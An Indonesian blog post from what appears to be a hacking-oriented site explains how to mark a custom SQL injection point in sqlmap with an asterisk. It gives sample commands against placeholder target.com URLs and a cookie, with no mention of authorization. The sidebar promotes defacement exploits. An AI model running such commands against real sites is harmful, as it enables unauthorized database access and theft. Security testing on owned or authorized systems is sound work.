• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Menentukan Inject Point pada SQLmap

April 28, 2019 by Jack Wilder 10 Comments

Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.

Misalnya begini:

https://target.com/article.php?page=2&id=5

Dan inject pointnya ada di parameter id.  Maka perintahnya

sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs

Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di

https://target.com/article-315'-abcde.html

Maka di sqlmap perintahnya

sqlmap -u "https://target.com/article-315*-abcde.html" --dbs

Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya

sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
  • referensi : https://miloserdov.org/?p=879
Shares

Filed Under: SQL Injection

Reader Interactions

Comments

  1. asu jalanan says

    June 12, 2019 at 8:49 pm

    min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?

    Reply
  2. Test Xss says

    July 19, 2019 at 11:25 pm

    Test Xss

    Reply
  3. Test Xss says

    July 19, 2019 at 11:26 pm

    Test Xss

    Reply
  4. Test Xss says

    July 19, 2019 at 11:27 pm

    Test Xss

    Reply
  5. Albert says

    August 7, 2019 at 1:29 pm

    Kalo yg diketahui cuman admin.php nya aja min?

    Reply
    • rio says

      April 14, 2022 at 3:00 pm

      ya injectnya di www.domain.com/admin.php*

      Reply
  6. njn says

    October 19, 2019 at 10:47 am

    kontol lu mmk jembdot

    Reply
  7. AN RIDHO EDI WIBOWO says

    October 17, 2020 at 7:15 pm

    kalau saya minta dibantu ambilkan admin web saya yang dibuatkan pihak ketiga bisa nggak sobat,saya nggak bisa kendalikan semua jadi ribet kawan.

    Reply
  8. vshs says

    December 24, 2020 at 10:59 pm

    testes

    Reply
  9. testes says

    December 24, 2020 at 11:01 pm

    teetesss

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Deface dengan Metode Timthumb Remote Code Execution

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Uptimerobot.com Custom Domain or Subdomain Takeover

WordPress Army Knife CSRF File Upload Vulnerability

Cara Mudah Hack cPanel dengan Fitur Reset Password

WordPress 4.7.0/4.7.1 Content Injection Exploit

Open Redirect Bypass Cheat Sheet

Cracking FTP Password using Hydra on BackBox Linux

LinuxSec / 85 queries in 0.19 seconds